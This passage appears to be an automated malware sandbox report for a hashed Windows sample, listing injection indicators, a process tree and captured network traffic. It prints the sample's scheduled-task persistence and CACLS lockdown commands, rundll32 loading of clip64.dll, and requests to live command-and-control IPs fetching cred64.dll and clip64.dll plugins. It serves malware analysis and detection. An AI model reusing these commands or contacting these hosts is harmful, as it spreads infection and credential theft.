2496	MicrosoftEdgeCP.exe
2496	MicrosoftEdgeCP.exe
2496	MicrosoftEdgeCP.exe
2496	MicrosoftEdgeCP.exe
2496	MicrosoftEdgeCP.exe
2496	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4616	AppLaunch.exe
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeDebugPrivilege	4320	E5C7.exe
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeDebugPrivilege	2544	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2544	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2544	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2544	MicrosoftEdgeCP.exe
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeDebugPrivilege	4420	E74F.exe
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeDebugPrivilege	4576	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4576	MicrosoftEdgeCP.exe
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found
Token: SeCreatePagefilePrivilege	3316	Process not Found
Token: SeShutdownPrivilege	3316	Process not Found

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3876	MicrosoftEdge.exe
2496	MicrosoftEdgeCP.exe
2544	MicrosoftEdgeCP.exe
2496	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3684 wrote to memory of 212	3684	cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe	69
PID 3684 wrote to memory of 212	3684	cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe	69
PID 3684 wrote to memory of 212	3684	cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe	69
PID 3684 wrote to memory of 3968	3684	cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe	70
PID 3684 wrote to memory of 3968	3684	cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe	70
PID 3684 wrote to memory of 3968	3684	cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe	70
PID 3684 wrote to memory of 3968	3684	cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe	70
PID 3684 wrote to memory of 3968	3684	cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe	70
PID 3684 wrote to memory of 3968	3684	cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe	70
PID 3684 wrote to memory of 3968	3684	cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe	70
PID 3684 wrote to memory of 3968	3684	cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe	70
PID 3684 wrote to memory of 3968	3684	cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe	70
PID 3684 wrote to memory of 3968	3684	cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe	70
PID 3968 wrote to memory of 2392	3968	AppLaunch.exe	71
PID 3968 wrote to memory of 2392	3968	AppLaunch.exe	71
PID 3968 wrote to memory of 2392	3968	AppLaunch.exe	71
PID 2392 wrote to memory of 2232	2392	z9278342.exe	72
PID 2392 wrote to memory of 2232	2392	z9278342.exe	72
PID 2392 wrote to memory of 2232	2392	z9278342.exe	72
PID 2232 wrote to memory of 876	2232	z6883031.exe	73
PID 2232 wrote to memory of 876	2232	z6883031.exe	73
PID 2232 wrote to memory of 876	2232	z6883031.exe	73
PID 876 wrote to memory of 4196	876	z9008345.exe	74
PID 876 wrote to memory of 4196	876	z9008345.exe	74
PID 876 wrote to memory of 4196	876	z9008345.exe	74
PID 4196 wrote to memory of 4516	4196	z6114861.exe	75
PID 4196 wrote to memory of 4516	4196	z6114861.exe	75
PID 4196 wrote to memory of 4516	4196	z6114861.exe	75
PID 4516 wrote to memory of 4616	4516	q1888334.exe	76
PID 4516 wrote to memory of 4616	4516	q1888334.exe	76
PID 4516 wrote to memory of 4616	4516	q1888334.exe	76
PID 4516 wrote to memory of 4616	4516	q1888334.exe	76
PID 4516 wrote to memory of 4616	4516	q1888334.exe	76
PID 4516 wrote to memory of 4616	4516	q1888334.exe	76
PID 4516 wrote to memory of 4616	4516	q1888334.exe	76
PID 4516 wrote to memory of 4616	4516	q1888334.exe	76
PID 4196 wrote to memory of 1036	4196	z6114861.exe	77
PID 4196 wrote to memory of 1036	4196	z6114861.exe	77
PID 4196 wrote to memory of 1036	4196	z6114861.exe	77
PID 1036 wrote to memory of 4784	1036	r9900670.exe	78
PID 1036 wrote to memory of 4784	1036	r9900670.exe	78
PID 1036 wrote to memory of 4784	1036	r9900670.exe	78
PID 1036 wrote to memory of 4784	1036	r9900670.exe	78
PID 1036 wrote to memory of 4784	1036	r9900670.exe	78
PID 1036 wrote to memory of 4784	1036	r9900670.exe	78
PID 1036 wrote to memory of 4784	1036	r9900670.exe	78
PID 1036 wrote to memory of 4784	1036	r9900670.exe	78
PID 1036 wrote to memory of 4784	1036	r9900670.exe	78
PID 1036 wrote to memory of 4784	1036	r9900670.exe	78
PID 876 wrote to memory of 4072	876	z9008345.exe	79
PID 876 wrote to memory of 4072	876	z9008345.exe	79
PID 876 wrote to memory of 4072	876	z9008345.exe	79
PID 4072 wrote to memory of 2876	4072	s9788652.exe	82
PID 4072 wrote to memory of 2876	4072	s9788652.exe	82
PID 4072 wrote to memory of 2876	4072	s9788652.exe	82
PID 4072 wrote to memory of 2772	4072	s9788652.exe	83
PID 4072 wrote to memory of 2772	4072	s9788652.exe	83
PID 4072 wrote to memory of 2772	4072	s9788652.exe	83
PID 4072 wrote to memory of 2772	4072	s9788652.exe	83
PID 4072 wrote to memory of 2772	4072	s9788652.exe	83
PID 4072 wrote to memory of 2772	4072	s9788652.exe	83
PID 2232 wrote to memory of 2756	2232	z6883031.exe	84
PID 2232 wrote to memory of 2756	2232	z6883031.exe	84
PID 2232 wrote to memory of 2756	2232	z6883031.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe
"C:\Users\Admin\AppData\Local\Temp\cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3684
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:212
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3968
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z9278342.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z9278342.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:2392
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\z6883031.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\z6883031.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:2232
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\z9008345.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\z9008345.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:876
      - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\z6114861.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\z6114861.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:4196
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\q1888334.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\q1888334.exe
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4516
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        Modifies Windows Defender Real-time Protection settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\r9900670.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\r9900670.exe
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1036
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:4784
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4784 -s 572
        9⤵
        Program crash
        
        PID:4960
      - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\s9788652.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\s9788652.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4072
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:2876
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:2772
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\t6290031.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\t6290031.exe
        5⤵
        Executes dropped EXE
        
        PID:2756
      - C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe"
        6⤵
        Executes dropped EXE
        
        PID:1704
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explonde.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe" /F
        7⤵
        Creates scheduled task(s)
        
        PID:3468
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explonde.exe" /P "Admin:N"&&CACLS "explonde.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
        7⤵
        
        PID:5000
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        8⤵
        
        PID:4836
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explonde.exe" /P "Admin:N"
        8⤵
        
        PID:4396
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explonde.exe" /P "Admin:R" /E
        8⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        8⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:N"
        8⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:R" /E
        8⤵
        
        PID:3876
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        7⤵
        Loads dropped DLL
        
        PID:4160
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\u7082745.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\u7082745.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:4768
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
        PID:2104
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\w6465232.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\w6465232.exe
    3⤵
    - Executes dropped EXE
    PID:4104
  - - C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe
      "C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe"
      4⤵
      Executes dropped EXE
      PID:2824
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legota.exe /TR "C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:3436
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legota.exe" /P "Admin:N"&&CACLS "legota.exe" /P "Admin:R" /E&&echo Y|CACLS "..\cb378487cf" /P "Admin:N"&&CACLS "..\cb378487cf" /P "Admin:R" /E&&Exit
        5⤵
        
        PID:1620
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:2896
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "legota.exe" /P "Admin:N"
        6⤵
        
        PID:4388
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "legota.exe" /P "Admin:R" /E
        6⤵
        
        PID:508
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:2120
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\cb378487cf" /P "Admin:N"
        6⤵
        
        PID:3836
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\cb378487cf" /P "Admin:R" /E
        6⤵
        
        PID:1056
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:2036

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
1⤵
- Executes dropped EXE
PID:4612

C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe
C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe
1⤵
- Executes dropped EXE
PID:1240

C:\Users\Admin\AppData\Local\Temp\E5C7.exe
C:\Users\Admin\AppData\Local\Temp\E5C7.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4320

C:\Users\Admin\AppData\Local\Temp\E74F.exe
C:\Users\Admin\AppData\Local\Temp\E74F.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4420

C:\Users\Admin\AppData\Local\Temp\ED6A.exe
C:\Users\Admin\AppData\Local\Temp\ED6A.exe
1⤵
- Executes dropped EXE
PID:4912
- C:\Windows\SysWOW64\regsvr32.exe
  "C:\Windows\System32\regsvr32.exe" .\e_UVb3RA.9 /s
  2⤵
  - Loads dropped DLL
  PID:4412

C:\Users\Admin\AppData\Local\Temp\EF40.exe
C:\Users\Admin\AppData\Local\Temp\EF40.exe
1⤵
- Executes dropped EXE
PID:4908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F1F1.bat" "
1⤵
- Checks computer location settings
PID:920

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3876

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:2736

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
1⤵
- Executes dropped EXE
PID:3592

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2496

C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe
C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe
1⤵
- Executes dropped EXE
PID:784

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2544

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:32

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2940

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4576

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3480

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:760

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4372

Network

DNS

135.121.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

135.121.18.2.in-addr.arpa

IN PTR

Response

135.121.18.2.in-addr.arpa

IN PTR

a2-18-121-135deploystaticakamaitechnologiescom
DNS

0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

Remote address:

8.8.8.8:53

Request

0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

IN PTR

Response
POST

http://77.91.68.52/mac/index.php

explonde.exe

Remote address:

77.91.68.52:80

Request

POST /mac/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.52
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 01:46:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
DNS

52.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

52.68.91.77.in-addr.arpa

IN PTR

Response

52.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
POST

http://77.91.68.78/help/index.php

legota.exe

Remote address:

77.91.68.78:80

Request

POST /help/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.78
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 01:46:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
DNS

78.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

78.68.91.77.in-addr.arpa

IN PTR

Response

78.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://saxkxleorf.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 283
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 01:47:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rdjqsl.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 149
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 01:47:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 49
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

29.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.68.91.77.in-addr.arpa

IN PTR

Response

29.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://glgeqlwpkn.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 204
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 01:47:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

13.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.227.111.52.in-addr.arpa

IN PTR

Response
GET

http://77.91.68.52/mac/Plugins/cred64.dll

explonde.exe

Remote address:

77.91.68.52:80

Request

GET /mac/Plugins/cred64.dll HTTP/1.1
Host: 77.91.68.52

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 01:47:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
GET

http://77.91.68.52/mac/Plugins/clip64.dll

explonde.exe

Remote address:

77.91.68.52:80

Request

GET /mac/Plugins/clip64.dll HTTP/1.1
Host: 77.91.68.52

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 01:47:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 06 Sep 2023 11:32:32 GMT
ETag: "16400-604af19645c6a"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
GET

http://77.91.68.78/help/Plugins/cred64.dll

legota.exe

Remote address:

77.91.68.78:80

Request

GET /help/Plugins/cred64.dll HTTP/1.1
Host: 77.91.68.78

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 01:47:45 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
GET

http://77.91.68.78/help/Plugins/clip64.dll

legota.exe

Remote address:

77.91.68.78:80

Request

GET /help/Plugins/clip64.dll HTTP/1.1
Host: 77.91.68.78

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 01:47:45 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 06 Sep 2023 11:40:52 GMT
ETag: "16400-604af373ed405"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rakhahibt.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 188
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 01:47:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kclodfycti.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 184
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 01:47:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

